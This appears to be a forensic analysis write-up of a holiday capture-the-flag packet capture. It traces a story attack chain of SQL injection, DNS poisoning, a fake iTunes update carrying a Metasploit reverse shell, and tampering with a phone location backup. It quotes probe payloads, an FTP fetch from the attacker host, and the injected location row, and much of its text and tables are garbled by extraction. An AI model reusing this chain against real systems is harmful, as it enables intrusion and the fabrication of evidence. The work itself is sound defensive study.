Professional Documents
Culture Documents
1 Overview
1.1 Signicant events
Table 1 provides a summarization of the most signicant events identied and analyzed on the following pages. 1 2 3 4 Time Event 13:51 Email from Grandma to Mel revealing a plot to frame Rudolph of her murder, mail has hidden content which reveals Grandmas current location. 13:51 Probing of Web server, attacker nds that the server is vulnerable to SQL injection (source 192.168.1.10) 13:52 SQL injection on web server, injections of data which results in specic apple.com hosts resolving to 192.168.1.10. (DNS poisoning) 13:57 Rudolph computer tries to update iTunes, but due to DNS poisoning is redirected to a service provided by the attacker which servers a piece of malware used by the attacker inject a set of coordinates (40.7715,-73.978833) into a backup of Rudolphs cellular phone.. Table 1: Signicant events #
DNS poisoning(sql injection) Get iTunesUpdate Attacker 192.168.1.10 (Grandma) Reverse shell Get sqlite.exe (ftp) Change iPhone coordinates Delete sqlite.exe Target 172.19.79.6 (Rudolph) DNS and Web Server 172.19.79.2
Uses DNS
2 Analysis
An in-depth analysis of the most signicant hosts and events found in the provided packet dump.
GET / HTTP/1.1 Host: www.santaslist.northpole UserAgent: Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Date: Sun, 25 Dec 2011 07:42:26 0500 (EST) From: Grandma <root@grandma.gma> XXSender: root@bt To: cousinmel@mail.gma Subject: Christmas MessageID: <alpine.DEB.2.02.1112250741440.7396@bt> UserAgent: Alpine 2.02 (DEB 1266 20090714) MIMEVersion: 1.0 ContentType: MULTIPART/MIXED; BOUNDARY="04715920431324816946=:7396"
2.1.2 IP 172.19.79.2 Web server serving www.santaslist.northpole, running Apache 2.2.15 on CentOS and using PHP 5.3.2. (See snippet 3). Snippet 3 HTTP headers from webserver www.santaslist.northpole
1 2 3 4
HTTP/1.1 200 OK Date: Sun, 25 Dec 2011 12:52:58 GMT Server: Apache/2.2.15 (CentOS) XPoweredBy: PHP/5.3.2
2.1.3 IP 172.19.89.6 Accordingly to headers(see snippet 4) extracted from HTTP requests this system is running Windows XP Professional SP3 and have an outdated version of iTunes installed (10.3.1), furthermore path-naming and username information were foud which indicates that the owner of this system is named Rudolph as shown in snippet 5. Snippet 4 HTTP header from 172.19.89.6
1 2
GET /bag.xml?ix=4 HTTP/1.1 UserAgent: iTunes/10.3.1 (Windows; Microsoft Windows XP Professional Service Pack 3 (Build 2600)) AppleWebKit/533.21.1
C:\Documents and Settings\Rudolph\Application Data\Apple Computer\MobileSync\Backup\ e409a4c01ece2a9e6bf9267b169f3b15616b98cd>ftp A 192.168.1.10 [...] Anonymous login succeeded for Rudolph@RUDOLPHPC
Dear Mel, Our plans are almost complete, and I am very excited. Soon, you and I shall be spending the rest of our days relaxing in the surf and sun! The plan is highly sensitive, a deep secret that only the two of us share. Never tell another soul about our clever scheme as long as you live. As we discussed, I recently made you the sole beneciary of my life insurance policy. On Christmas Eve, I plan on faking my own death, which I will frame as murder on Rudolph, Santas obnoxious reindeer. The details of my plan are included in the attached document below. Read it carefully. Merry Christmas! Grandma
Dear Mel, Here are the details of my secret plan. After the investigation turns up the evidence I plant, you provide eyewitness testimony in court, and Rudolph is convicted, you will receive the insurance payout. We can then use that money to fund our Caribbean retirement. I am not sure I ever told you this, Mel, but as a child, my village was attacked by a ravenous band of rampaging reindeer, instilling a lifelong hatred in me for the eabitten beasts. Ill never forget their horrible comments as they galloped through our village. Because of that chilling childhood experience, Im going to fake my death and blame it all on Rudolph, the most wellknown reindeer of all. Hell rot away in jail forever. Merry Christmas, Grandma
I will hide out at the Plaza Hotel near Central Park for several weeks, and meet you there in the lobby exactly one week after the trial concludes with a guilty verdict for Rudolph, precisely at noon local time. Make sure you bring the money in a suitcase full of cash. Ill be wearing one red shoe.
2.2.2 #2 - Probing of web server Soon after issuing the mail previously mentioned, the attacker launched a series of probes on a web server (172.19.79.2). Initially the attacker issued a few HTTP probes, shown in snippet 9, the purpose of these probes is assessed to be information gathering and identication of vulnerabilities. The attacker successfully identied a SQL injection vulnerability by injecting a single quote (hex value 27) as a value to the name parameter in the naughty list form, the server response suggesting this vulnerability is shown in snippet 10.
Snippet 9 Generic probing GET / HTTP/1.1 POST /checklist.php HTTP/1.1 name=Grandma name=Cousin+Mel name=%27
HTTP/1.1 200 OK Date: Sun, 25 Dec 2011 12:53:28 GMT Server: Apache/2.2.15 (CentOS) < CUT > <tr><th>Name</th><th>Status</th></tr> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1</table> </body></html>
2.2.3 #3 - SQL injection (DNS Poisoning) The attacker starts out by injecting a few SELECT queries to identify the data and schema already stored in the database, the results are displayed enumerated in the naughty list as shown in gure 2 on the next page, after a few queries the attacker is able to reconstruct the relevant parts of the DNS database as shown in table 2a on page 9. The attacker then injects a single Start of Authority (SOA) record in the MYDNS.soa stating that the origin apple.com is best resolved at ns1.santaslist.northpole, which in plain english states that ns1.santaslist.northpole is the best place to lookup *.apple.com host names. Lastly a series of apple.com hosts are injected into the Resource Record (RR) table stating that the specied hosts resolved to 192.168.1.10 - again in plain English this states that when a client lookups one of the injected hostsname they will resolve to 192.168.1.10 - which is the IP of the attacker. A full overview of the SOA and RR tables after the attacker successfully has conducted his DNS poisoning is shown in table 2b on page 9.
604800
28800
santaslist.northpole
ns1.santaslist.northpole
root.santaslist.northpole
Original rr Table
ID 1 2 3 ZONE 1 1 1 NAME @ ns1.santaslist.northpole www.santaslist.northpole TYPE NS A A DATA ns1.santaslist.northpole 172.19.79.2 172.19.79.2 AUX 0 0 0 TTL 86400 86400 86400
604800
28800
santaslist.northpole
ns1.santaslist.northpole
root.santaslist.northpole
604800
28800
apple.com
ns1.santaslist.northpole
root.santaslist.northpole
Modied rr Table
ID 1 ZONE 1 NAME @ TYPE NS DATA ns1.santaslist.northpole AUX 0 TTL 86400
2 3 4 5 6 7 8
1 1 2 2 2 2 2
A A A A A A A
0 0
86400
7200
86400
7200
25
TTL
NS
ID
86400
7200
25
TTL
NS
ID
2.2.4 #4 - Infection of Rudolphs computer The infection process The target is infected through a malicious iTunes update, the attacker has made arrangements as described in 2.2.3 to make specic apple.com hosts resolve to his own machine (192.168.1.10) where he is hosting a malicious update service serving malware instead of legit updates - it is likely that the attacker is using EvilGrade1 (or a similar tool) to facilitate this. The requests from the targets iTunes instance to the malicious update service are shown in table 3. An analysis of the trac has shown that the target is using an old version of iTunes (10.3.1) which is vulnerable2 to this specic attack vector which allows download and execution of unsigned updates. Client request GET /bag.xml?ix=4 GET /version?machineID=101a1a42c676ea68 GET /content/catalogs/others/index-windows-1.sucatalog GET /content/downloads/14/21/[SNIP]/061-4339.English.dist GET /iTunesSetup.exe Table 3: Update requests The malware After execution of the malware, the malware tries to connect back to the attacker on port 1225 using a standard TCP three way handshake - after the connection is established the malware seemingly awaits stimulus before acting further, this stimulus was captured in the provided PCAP show in gure 3 on the following page, when comparing this stimulus with the shell.rb source code of Metasploit, as shown in gure 4 on the next page, it can be concluded with little doubt that the malware is a legit binary3 wrapped with a Metasploit reverse_tcp stager - and that the actual staging used by attacker is a shell. Intended host ax.init.itunes.apple.com itunes.apple.com swcatalog.apple.com swcatalog.apple.com swcatalog.apple.com
1 2
http://www.infobytesec.com/down/isr-evilgrade-Readme.txt Fixed in 10.5.1 http://support.apple.com/kb/HT5030?viewlocale=en_US 3 Apache Bench - found by static analysis of the binary.
10
Figure 4: Metaspoit source code (/modules/payloads/stages/windows/shell.rb) A test was conducted in an isolated environment using two hosts - a Windows XP SP3 running the malware (extracted from the PCAP) and Backtrack 5R2 running Meatas-
11
ploit. As shown in gure 5 the test demonstrated that the malware actually works as described above.
Figure 5: Injection of shell payload. Modication of coordinates on Rudolphs computer. At this point the attacker has shell access to Rudolphs computer where he downloads a copy of sqlite3.exe from his own machine. The attacker uses this tool to inject a set of coordinates into a backup of Rudolphs phones cellular location database which is stored locally on Rudolphs computer. The coordinates and timing injected matches the crime-scene4 , as shown in gure 6 on the following page, - which would lead a forensic investigator to the conclusion that Rudolph, or at least his phone, was at the crime-scene when the alleged crime occurred. Snippet 11 Command used to inject data
1
The manipulated celluar location database is shown in snippet 12 on the next page(the injected data is shown on line 23).
Crime-scene coordinates was extracted from the photo of the crimescene - http://pen-testing.sans. org/images/challenges/holiday/evidence.jpg
12
310|410|11504|165415283|346413600.207493|90.0|0.0|1414.0|0.0|1.0|1.0|1.0|50 310|410|11560|165415876|346417200.724667|36.848461|174.763333|1414.0|0.0|1.0|1.0|1.0|50 310|410|11913|165415988|346424400.845503|33.87365|151.206889|1414.0|0.0|1.0|1.0|1.0|50 310|410|11490|165415931|346431600.789114|35.689489|139.691706|1414.0|0.0|1.0|1.0|1.0|50 310|410|11486|165415119|346433400.698928|40.332808|116.47765|1414.0|0.0|1.0|1.0|1.0|50 310|410|11387|165415444|346435200.577698|39.904214|116.407414|1414.0|0.0|1.0|1.0|1.0|50 310|410|11647|165415648|346449600.307924|55.752505|37.623168|1414.0|0.0|1.0|1.0|1.0|50 310|410|11563|165415337|346458600.605536|52.523406|13.4114|1414.0|0.0|1.0|1.0|1.0|50 310|410|11293|165419827|346460400.123529|48.858362|2.294242|1414.0|0.0|1.0|1.0|1.0|50 310|410|11245|165415050|346464000.957372|51.505624|0.075383|1414.0|0.0|1.0|1.0|1.0|50 310|410|11341|165413757|346471200.820172|22.903539|43.209587|1414.0|0.0|1.0|1.0|1.0|50 310|410|11146|165413900|346478400.428421|18.467964|66.108809|1414.0|0.0|1.0|1.0|1.0|50 310|410|11150|165413038|346480200.261264|6.42375|66.58973|1414.0|0.0|1.0|1.0|1.0|50 310|410|11342|165415572|346482000.116289|40.748245|73.985534|1414.0|0.0|1.0|1.0|1.0|50 310|410|11880|165413161|346483440.664151|43.653226|79.383184|1414.0|0.0|1.0|1.0|1.0|50 310|410|11537|165415788|346484520.528258|40.440625|79.995886|1414.0|0.0|1.0|1.0|1.0|50 310|410|11363|165415476|346485600.313375|41.8789|87.63584|1414.0|0.0|1.0|1.0|1.0|50 310|410|11686|165413799|346489201.224764|39.739094|104.984898|1414.0|0.0|1.0|1.0|1.0|50 310|410|11998|165414519|346492800.167865|37.819751|122.478168|1414.0|0.0|1.0|1.0|1.0|50 310|410|11312|165413083|346496400.422522|61.190009|149.870694|1414.0|0.0|1.0|1.0|1.0|50 310|410|11409|165413229|346500000.268656|21.307237|157.858055|1414.0|0.0|1.0|1.0|1.0|50 310|410|11504|165415284|346503600.473327|90.0|0.0|1414.0|0.0|1.0|1.0|1.0|50 310|410|11250|116541837|346471200.820172|40.7715|73.978833|1414.0|0.0|1.0|1.0|1.0|50
Figure 6: Plot of injected coordinate and crime-scene. (green arrow - same location)
13
14